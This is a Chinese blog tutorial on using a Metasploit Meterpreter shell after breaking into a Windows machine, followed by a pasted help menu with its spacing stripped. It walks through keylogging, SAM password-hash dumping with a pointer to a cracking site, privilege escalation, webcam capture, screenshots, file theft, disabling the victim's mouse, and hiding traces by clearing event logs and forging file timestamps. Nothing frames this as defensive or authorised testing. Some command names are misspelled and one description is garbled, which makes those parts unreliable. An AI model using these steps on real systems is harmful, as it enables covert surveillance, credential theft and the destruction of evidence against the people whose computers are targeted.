metasploit获取shell之后进一步利用！metasploit+sessions

当你用Metasploit成功的入侵一台Windows主机后，你会获得一个Meterpreter 的Shell，今天我就会给大家讲一讲Meterpreter 获取shell以后的运用

当你看到了

[*] Meterpreter session 1 opened (192.168.195.140:4444 -> 192.168.195.139:1051)

这就代表这你在目标系统上成功的获得了Meterpreter的Shell

sessions -l用于查看你控制的电脑

你会看到：

 
 
  
  IdDescriptionTunnel
  
  
  
  4 meterpreterx86/win32server-PC\Administrator@SERVER-PC192.168.195.140:4444->192.168.195.1:52540(192.168.195.1)

注意前面的ID号

你要控制哪台就输入：

meterpreter >sessions -i 4

例如本次案例ID号为:4

meterpreter >sysinfo

显示目标系统信息

meterpreter > backround

退出目标系统，回到Metasploit主界面

meterpreter > ps

显示目标系统上的进程

meterpreter > keyscan_start

监控目标系统键盘输入，停止监控为keyscan_stop

meterpreter >migrate

将你的Meterpreter移到另一个进程

先用PS命令查看进程后，得到进程ID，然后在执行Migrate （进程ID）

meterpreter > ipconfig

显示对方网络信息

meterpreter > getuid

获取用户的服务器运行

meterpreter > shell

进入目标电脑，命令提示符

meterpreter > Idletime

目标电脑闲置了多长时间

meterpreter > Hashdump

导出对方SAM数据库里的内容,推荐一个hash破解网站：

http://www.objectif-securite.ch/products.PHP

meterpreter > getsystem

利用已自漏洞，自动提权为SYstem

meterpreter > clearev

清除事件日志

meterpreter > execute （某Windows指令）

在对方电脑上运行该指令

  
  meterpreter>execute
  
  Usage:execute-ffile[options]
  
  
  
  Executesacommandontheremotemachine.
  
  
  
  OPTIONS:
  
  
  
  -HCreatetheprocesshiddenfromview.
  
  -a<opt>Theargumentstopasstothecommand.
  
  -cChannelizedI/O(requiredforinteraction).
  
  -d>The'dummy'executabletolaunchwhenusing-m.
  
  -f>Theexecutablecommandtorun.
  
  -hHelpmenu.
  
  -iInteractwiththeprocessaftercreatingit.
  
  -kExecuteprocessonthemeterpreterscurrentdesktop
  
  -mExecutefrommemory.
  
  -s>Executeprocessinagivensessionasthesessionuser
  
  -tExecuteprocesswithcurrentlyimpersonatedthreadtoken

meterpreter >timetomp

修改文件时间属性

meterpreter >timestomp c:\\jzking121.txt -c "09/09/1980 12:12:34" 修改文件创建时间

meterpreter > timestomp c:\\jzking121.txt -m "01/01/1991 12:12:34" 修改文件修改时间

meterpreter > timestomp c:\\jzking121.txt -f c:\\RHDSetup.log 讲文件RHDSetup.log属性复制到jzking121文件上面

meterpreter > download（文件路径）

下载文件命令

例如下载C盘下面的jzking121.txt文件

meterpreter > download c:\\jzking121.txt

[*] downloading: c:\jzking121.txt -> jzking121.txt

[*] downloaded : c:\jzking121.txt -> jzking121.txt

注意，文件路径中要有两个\\

Upload指令跟Download指令类似！

meterpreter > shutdown

关闭目标计算机，reboot为重启计算机

meterpreter >screenshot

获取目标电脑，屏幕截图

meterpreter > uictl enable keyboard启用目标使用键盘

meterpreter > uictl disable mouse 禁止目标使用鼠标

enable 为启用

disable 禁用

meterpreter > webcam_list

目标系统的摄像头列表

meterpreter > webcam_snap

从指定的摄像头，拍摄照片

meterpreter > search -d c:\\ -f 1.jpg

搜索目标电脑，C盘1.jpg文件

     
     
      
      meterpreter>help
      
      
      
      CoreCommands
      
      =============
      
      
      
      CommandDescription
      
      ------------------
      
      ?Helpmenu
      
      backgroundBackgroundsthecurrentsession
      
      bgkillKillsabackgroundmeterpreterscript
      
      bglistListsrunningbackgroundscripts
      
      bgrunExecutesameterpreterscriptasabackgroundthread
      
      channeldisplaysinformationaboutactivechannels
      
      closeClosesachannel
      
      disable_unicode_encodingdisablesencodingofunicodestrings
      
      enable_unicode_encodingEnablesencodingofunicodestrings
      
      exitTerminatethemeterpretersession
      
      helpHelpmenu
      
      infodisplaysinformationaboutaPostmodule
      
      interactInteractswithachannel
      
      irbDropintoirbscriptingmode
      
      loadLoadoneormoremeterpreterextensions
      
      migrateMigratetheservertoanotherprocess
      
      quitTerminatethemeterpretersession
      
      readReadsdatafromachannel
      
      resourceRunthecommandsstoredinafile
      
      runExecutesameterpreterscriptorPostmodule
      
      useDeprecatedaliasfor'load'
      
      writeWritesdatatoachannel
      
      
      
      
      
      Stdapi:FilesystemCommands
      
      ============================
      
      
      
      CommandDescription
      
      ------------------
      
      catReadthecontentsofafiletothescreen
      
      cdChangedirectory
      
      downloadDownloadafileordirectory
      
      editEditafile
      
      getlwdPrintlocalworkingdirectory
      
      getwdPrintworkingdirectory
      
      lcdChangelocalworkingdirectory
      
      lpwdPrintlocalworkingdirectory
      
      lsListfiles
      
      mkdirMakedirectory
      
      pwdPrintworkingdirectory
      
      rmDeletethespecifiedfile
      
      rmdirRemovedirectory
      
      searchSearchforfiles
      
      uploadUploadafileordirectory
      
      
      
      
      
      Stdapi:NetworkingCommands
      
      ===========================
      
      
      
      CommandDescription
      
      ------------------
      
      ifconfigdisplayinterfaces
      
      ipconfigdisplayinterfaces
      
      portfwdForwardalocalporttoaremoteservice
      
      routeViewandmodifytheroutingtable
      
      
      
      
      
      Stdapi:SystemCommands
      
      =======================
      
      
      
      CommandDescription
      
      ------------------
      
      clearevCleartheeventlog
      
      drop_tokenRelinquishesanyactiveimpersonationtoken.
      
      executeExecuteacommand
      
      getpidGetthecurrentprocessidentifier
      
      getprivsAttempttoenableallprivilegesavailabletothecurrentprocess
      
      getuidGettheuserthattheserverisrunningas
      
      killTerminateaprocess
      
      psListrunningprocesses
      
      rebootRebootstheremotecomputer
      
      regModifyandinteractwiththeremoteregistry
      
      rev2selfCallsRevertToSelf()ontheremotemachine
      
      shellDropintoasystemcommandshell
      
      shutdownShutsdowntheremotecomputer
      
      steal_tokenAttemptstostealanimpersonationtokenfromthetargetprocess
      
      sysinfoGetsinformationabouttheremotesystem,suchasOS
      
      
      
      
      
      Stdapi:UserinterfaceCommands
      
      ===============================
      
      
      
      CommandDescription
      
      ------------------
      
      enumdesktopsListallaccessibledesktopsandwindowstations
      
      getdesktopGetthecurrentmeterpreterdesktop
      
      idletimeReturnsthenumberofsecondstheremoteuserhasbeenidle
      
      keyscan_dumpDumpthekeystrokebuffer
      
      keyscan_startStartcapturingkeystrokes
      
      keyscan_stopStopcapturingkeystrokes
      
      screenshotGrabascreenshotoftheinteractivedesktop
      
      setdesktopChangethemeterpreterscurrentdesktop
      
      uictlControlsomeoftheuserinterfacecomponents
      
      
      
      
      
      Stdapi:WebcamCommands
      
      =======================
      
      
      
      CommandDescription
      
      ------------------
      
      webcam_listListwebcams
      
      webcam_snapTakeasnapshotfromthespecifiedwebcam
      
      
      
      
      
      Priv:ElevateCommands
      
      ======================
      
      
      
      CommandDescription
      
      ------------------
      
      getsystemAttempttoelevateyourprivilegetothatoflocalsystem.
      
      
      
      
      
      Priv:PassworddatabaseCommands
      
      ================================
      
      
      
      CommandDescription
      
      ------------------
      
      hashdumpDumpsthecontentsoftheSAMdatabase
      
      
      
      
      
      Priv:TimestompCommands
      
      ========================
      
      
      
      CommandDescription
      
      ------------------
      
      timestompManipulatefileMACEattributes

本文出自 “jzking121' blog” 博客，请务必保留此出处http://jzking121.blog.51cto.com/5436671/1074524

metasploit获取shell之后进一步利用！metasploit+sessions

相关文章